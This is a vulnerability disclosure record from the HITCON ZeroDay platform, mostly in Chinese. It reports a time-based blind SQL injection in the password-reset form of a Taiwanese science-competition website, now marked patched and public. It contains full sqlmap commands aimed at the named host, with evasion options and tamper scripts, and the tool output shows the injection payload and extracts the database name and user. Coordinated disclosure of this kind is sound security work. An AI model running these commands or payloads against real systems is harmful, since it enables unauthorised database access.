Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2026-01038
- Vendor: TACERT台灣學術網路危機處理中心
- Title: 全國科學探究競賽 MYSQL注入漏洞
- Introduction: SQL注入漏洞
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2026/08/17 13:07:50 : 新提交 (由 桃園怪人協會幹部之一 更新此狀態)
- 2026/08/17 13:08:29 : 新提交 (由 桃園怪人協會幹部之一 更新此狀態)
- 2026/08/17 13:12:07 : 新提交 (由 桃園怪人協會幹部之一 更新此狀態)
- 2026/08/17 13:33:52 : 新提交 (由 桃園怪人協會幹部之一 更新此狀態)
- 2026/08/18 17:25:56 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/08/31 16:46:39 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/08/31 16:46:39 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/08/31 16:46:39 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/09/10 16:00:16 : 已修補 (由 組織帳號 更新此狀態)
- 2026/09/18 03:00:06 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2026-01038
- 通報者:koby12345 (桃園怪人協會幹部之一)
- 風險:低
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
2019是問題發現點
https://sciexplore2018.colife.org.tw/
https://sciexplore2020.colife.org.tw/
https://sciexplore2021.colife.org.tw/
https://sciexplore2022.colife.org.tw/
https://sciexplore2023.colife.org.tw/
調查回報歷史發現 曾經也存在
根據
https://zeroday.hitcon.org/vulnerability/ZD-2020-00061
歷史網站 現今已經消失
http://event.weather.tp.edu.tw/contest/
http://event.weather.tp.edu.tw/contest/phpinfo.php
http://event.weather.tp.edu.tw/contest/test.php
敘述
取得數據庫名sciexplore
sqlmap -u "https://sciexplore2021.colife.org.tw/admin/process/pwd_con.php" \
--data "Userid=asdasdas&Email=a234123234a%40gmail.com&action=forgot" \
-p "Userid" \
--dbms=mysql \
--technique=T \
--current-db \
--batch \
--random-agent \
--threads 1 \
--delay=2 \
--tamper space2comment \
--level 3 \
--risk 2
[12:09:41] [INFO] loading tamper module 'space2comment'
[12:09:41] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 OpenWave/96.4.8983.84' from file '/usr/local/lib/python3.10/dist-packages/sqlmap/data/txt/user-agents.txt'
[12:09:41] [INFO] testing connection to the target URL
got a 302 redirect to 'https://sciexplore2021.colife.org.tw/admin/user-resetPwd.php?result=failed'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
[12:09:43] [WARNING] potential CAPTCHA protection mechanism detected
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ca406rh8br1...ik8q90sbu7'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
Parameter: Userid (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: Userid=asdasdas' AND (SELECT 8135 FROM (SELECT(!SLEEP(5)))QRaG) AND 'Mgtk'='Mgtk&[email protected]&action=forgot
[12:09:43] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[12:09:43] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[12:10:54] [INFO] confirming MySQL
[12:10:54] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[12:11:10] [INFO] adjusting time delay to 3 seconds due to good response times
[12:11:10] [INFO] the back-end DBMS is MySQL
web application technology: PHP, Nginx 1.28.0
back-end DBMS: MySQL >= 8.0.0
[12:11:10] [INFO] fetching current database
[12:11:10] [INFO] retrieved: sciexplore
current database: 'sciexplore'
[12:15:25] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
取得用戶名sciexplore@localhost
sqlmap -u "https://sciexplore2021.colife.org.tw/admin/process/pwd_con.php" \
--data "Userid=asdasdas&Email=a234123234a%40gmail.com&action=forgot" \
-p "Userid" \
--dbms=mysql \
--technique=T \
--sql-query "SELECT user()" \
--batch \
--random-agent \
--threads 1 \
--delay=2 \
--tamper space2comment \
--level 3 \
--risk 2
這個
https://zeroday.hitcon.org/vulnerability/ZD-2020-00061
回報的可以在
使用
https://sciexplore2019.colife.org.tw/
https://sciexplore2020.colife.org.tw/
https://sciexplore2021.colife.org.tw/
https://sciexplore2022.colife.org.tw/
https://sciexplore2023.colife.org.tw/
使用 我目前只測試
https://sciexplore2018.colife.org.tw/
https://sciexplore2019.colife.org.tw/
https://sciexplore2023.colife.org.tw/
範圍點
https://sciexplore2018.colife.org.tw/ 已經停止登入 但是其他的可以
完蛋 打著打著突然漏洞被修復了
全部已經修復 禁止登入2019~2023 都已經禁止登入
我跟之前那個不同 我打忘記密碼